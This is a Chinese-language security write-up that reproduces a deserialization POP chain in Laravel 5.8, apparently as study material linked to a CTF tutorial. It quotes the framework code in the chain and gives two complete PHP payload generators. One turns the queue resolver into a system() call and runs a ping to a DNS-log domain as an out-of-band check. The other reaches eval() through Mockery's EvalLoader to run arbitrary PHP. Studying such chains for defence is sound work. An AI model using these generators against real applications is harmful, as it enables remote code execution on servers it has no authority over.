Laravel5.8反序列化复现分析
搭建环境
使用composer下载项目环境
composer create-project --prefer-dist laravel/laravel=5.8.* ./
详细的搭建参考上篇文章
漏洞分析
这次 POP 链的起点(前提是应用在某处对攻击者可控的数据调用了 unserialize())位于
vendor\laravel\framework\src\Illuminate\Broadcasting\PendingBroadcast.php的析构函数
// Illuminate\Broadcasting\PendingBroadcast::__destruct (vendor code, quoted for analysis).
// Entry point of the POP chain: PHP runs this automatically when the object is destroyed
// (for a crafted payload, after unserialize() at request end), calling dispatch() on
// whatever object $events holds with whatever $event holds. In a serialized payload
// both properties are attacker-controlled, so this is an arbitrary ->dispatch() call.
public function __destruct(){$this->events->dispatch($this->event);}
全局搜索可被利用的 dispatch() 方法(这里选用 Illuminate\Bus\Dispatcher::dispatch(),它会先经过 commandShouldBeQueued() 判断再决定是否进入队列分发)

跟进查看commandShouldBeQueued()
// Illuminate\Bus\Dispatcher::commandShouldBeQueued (vendor code, quoted for analysis).
// Gate before dispatchToQueue(): only commands implementing ShouldQueue are queued.
// For the chain this just constrains which class $event may be — any framework
// class implementing ShouldQueue whose properties survive unserialize() qualifies.
protected function commandShouldBeQueued($command){return $command instanceof ShouldQueue;}
$command 需要实现 ShouldQueue 接口,因此全局查找一个实现了该接口、且属性可通过反序列化控制的合适类(下文选用 Illuminate\Broadcasting\BroadcastEvent)

跟进dispatchToQueue($command)
// Illuminate\Bus\Dispatcher::dispatchToQueue (vendor code, quoted for analysis).
// Resolves a queue connection for the command and pushes the command onto it.
// Security-relevant: $this->queueResolver and $command->connection are both restored
// from the serialized payload, so the call_user_func() below is an attacker-chosen
// callable invoked with one attacker-chosen argument.
public function dispatchToQueue($command)
{
    $connection = $command->connection ?? null;

    // Sink: arbitrary callable with a single controlled argument
    // (e.g. 'system' with a shell command, or [EvalLoader, 'load'] with a MockDefinition).
    $queue = call_user_func($this->queueResolver, $connection);

    // The callable has already executed by the time this check runs; a non-Queue
    // return value only produces an exception afterwards — presumably why the
    // command output of a system() payload is not echoed back in the response.
    if (! $queue instanceof Queue) {
        throw new RuntimeException('Queue resolver did not return a Queue implementation.');
    }

    if (method_exists($command, 'queue')) {
        return $command->queue($queue, $command);
    }

    return $this->pushCommandToQueue($queue, $command);
}
$this->queueResolver 作为 call_user_func() 的可调用对象(callable),$connection 作为它的唯一参数;两者都来自反序列化数据,因此这里相当于"任意函数调用 + 一个可控参数"
构造exp:
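<?php
// Payload generator for the Laravel 5.8 PendingBroadcast -> Dispatcher POP chain
// (PendingBroadcast::__destruct -> Dispatcher::dispatch -> dispatchToQueue ->
// call_user_func($queueResolver, $connection)).
// Only class names and property names/values matter to serialize(); the stand-in
// classes below carry none of the framework logic. On the target, unserialize()
// restores the real framework classes and their methods run.

namespace Illuminate\Broadcasting {
    // Stand-in for the class whose __destruct() starts the chain:
    // $events becomes the Illuminate\Bus\Dispatcher, $event the BroadcastEvent.
    class PendingBroadcast
    {
        protected $event;
        protected $events;

        public function __construct($events, $event)
        {
            $this->event = $event;
            $this->events = $events;
        }
    }

    // The real BroadcastEvent implements ShouldQueue, so Dispatcher::dispatch()
    // routes it to dispatchToQueue(); $connection is the value handed to the
    // queue resolver, i.e. the argument of the function named in $queueResolver.
    class BroadcastEvent
    {
        public $connection;

        public function __construct($connection)
        {
            $this->connection = $connection;
        }
    }
}

namespace Illuminate\Bus {
    // $queueResolver is passed verbatim to call_user_func() in dispatchToQueue();
    // setting it to 'system' turns that call into system($connection).
    class Dispatcher
    {
        protected $queueResolver;

        public function __construct($queueResolver)
        {
            $this->queueResolver = $queueResolver;
        }
    }
}

namespace {
    // system() runs the command, but returns a string rather than a Queue, so the
    // `instanceof Queue` check in dispatchToQueue() throws afterwards and the command
    // output is not returned in the response; an out-of-band check (DNS log) is used
    // to confirm execution instead.
    $c = new Illuminate\Broadcasting\BroadcastEvent('ping aiuuvg.dnslog.cn');
    $b = new Illuminate\Bus\Dispatcher('system');
    $a = new Illuminate\Broadcasting\PendingBroadcast($b, $c);

    // URL-encode so the serialized payload survives transport as a request parameter.
    print(urlencode(serialize($a)));
}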
命令本身已经执行,但 system() 的返回值不是 Queue 实例,dispatchToQueue() 随后的 instanceof 判断会抛出 RuntimeException,因此命令输出不会回显;不过可以用无回显方式验证,比如 ping 到 DNS 日志域名。接下来看能否直接执行 PHP 代码:全局搜索 eval

需要绕过 load() 中的第一个判断,不能让它提前 return;跟进 getClassName()
// Mockery\Generator\MockDefinition::getClassName (vendor code, quoted for analysis).
// Delegates to the injected MockConfiguration; since $config is restored from the
// payload, the "class name" checked by EvalLoader::load() is attacker-chosen.
public function getClassName(){return $this->config->getName();}
getName() 位于 MockConfiguration.php,name 可任意设置,但按 load() 第一个判断的逻辑,它不能命中一个已存在的类名,否则会直接 return 而执行不到 eval()

接着跟进getCode
// Mockery\Loader\EvalLoader::load (excerpt): the eval() sink. $definition is the
// MockDefinition that arrived as $connection, so getCode() returns attacker-controlled
// text. The "?>" prefix leaves PHP mode first, so the payload executes as PHP only if
// it begins with "<?php"; anything before an opening tag is simply echoed.
eval("?>" . $definition->getCode());
这里返回的 code 会被拼接在 "?>" 之后交给 eval(),将它设为想执行的代码即可;注意由于前面的 "?>" 先退出了 PHP 模式,code 必须以 "<?php" 开头才会作为 PHP 代码执行,否则只会被原样输出
// Mockery\Generator\MockDefinition::getCode (vendor code, quoted for analysis).
// Plain getter for $code — the string that EvalLoader::load() passes to eval().
// $code is a serialized property, so it is fully attacker-controlled.
public function getCode(){return $this->code;}
构造exp:
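<?php
// Payload generator for the eval() variant of the chain:
// PendingBroadcast::__destruct -> Dispatcher::dispatch -> dispatchToQueue
//   -> call_user_func([EvalLoader, 'load'], $connection)
//   -> EvalLoader::load(MockDefinition) -> eval("?>" . $definition->getCode()).
// NOTE(review): Mockery\Loader\EvalLoader belongs to the mockery package, which the
// Laravel skeleton pulls in as a dev dependency — this chain presumably needs the
// target's vendor/ to include dev packages; confirm before relying on it.

namespace Illuminate\Broadcasting {
    use Mockery\Generator\MockConfiguration;
    use Mockery\Generator\MockDefinition;

    // Stand-in for the class whose __destruct() starts the chain.
    class PendingBroadcast
    {
        protected $event;
        protected $events;

        public function __construct($events, $event)
        {
            $this->event = $event;
            $this->events = $events;
        }
    }

    // $connection is the single argument handed to the queue resolver; here it is the
    // MockDefinition that EvalLoader::load() expects as its (type-hinted) parameter.
    // $code is the PHP source to be eval()'d on the target; it defaults to empty so the
    // generated payload exercises the chain without executing anything.
    class BroadcastEvent
    {
        public $connection;

        public function __construct($code = '')
        {
            $this->connection = new MockDefinition(new MockConfiguration(), $code);
        }
    }
}

namespace Illuminate\Bus {
    // $queueResolver is passed verbatim to call_user_func(); an array callable
    // [$object, 'method'] makes it call $object->method($connection).
    class Dispatcher
    {
        protected $queueResolver;

        public function __construct($queueResolver)
        {
            $this->queueResolver = $queueResolver;
        }
    }
}

namespace Mockery\Loader {
    // Stand-in: only the class name is serialized; the real EvalLoader::load() runs on the target.
    class EvalLoader
    {
    }
}

namespace Mockery\Generator {
    // getCode() returns $code, which load() concatenates after "?>" and passes to eval().
    // Because of that "?>" prefix the payload must start with "<?php" to run as PHP;
    // any text before an opening tag is emitted literally instead of executed.
    class MockDefinition
    {
        protected $config;
        protected $code;

        public function __construct($config, $code = '')
        {
            $this->config = $config;
            $this->code = $code;
        }
    }

    // getName() supplies the name checked by load()'s first guard; it must not resolve
    // to an already-declared class, otherwise load() returns before reaching eval().
    class MockConfiguration
    {
        protected $name = "kb";
    }
}

namespace {
    $c = new Illuminate\Broadcasting\BroadcastEvent();
    // Array callable: call_user_func([$loader, 'load'], $connection) -> $loader->load($connection).
    $b = new Illuminate\Bus\Dispatcher([new Mockery\Loader\EvalLoader, 'load']);
    $a = new Illuminate\Broadcasting\PendingBroadcast($b, $c);

    // URL-encode so the serialized payload survives transport as a request parameter.
    print(urlencode(serialize($a)));
}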

参考链接:合天网安-通过几道CTF题学习Laravel框架
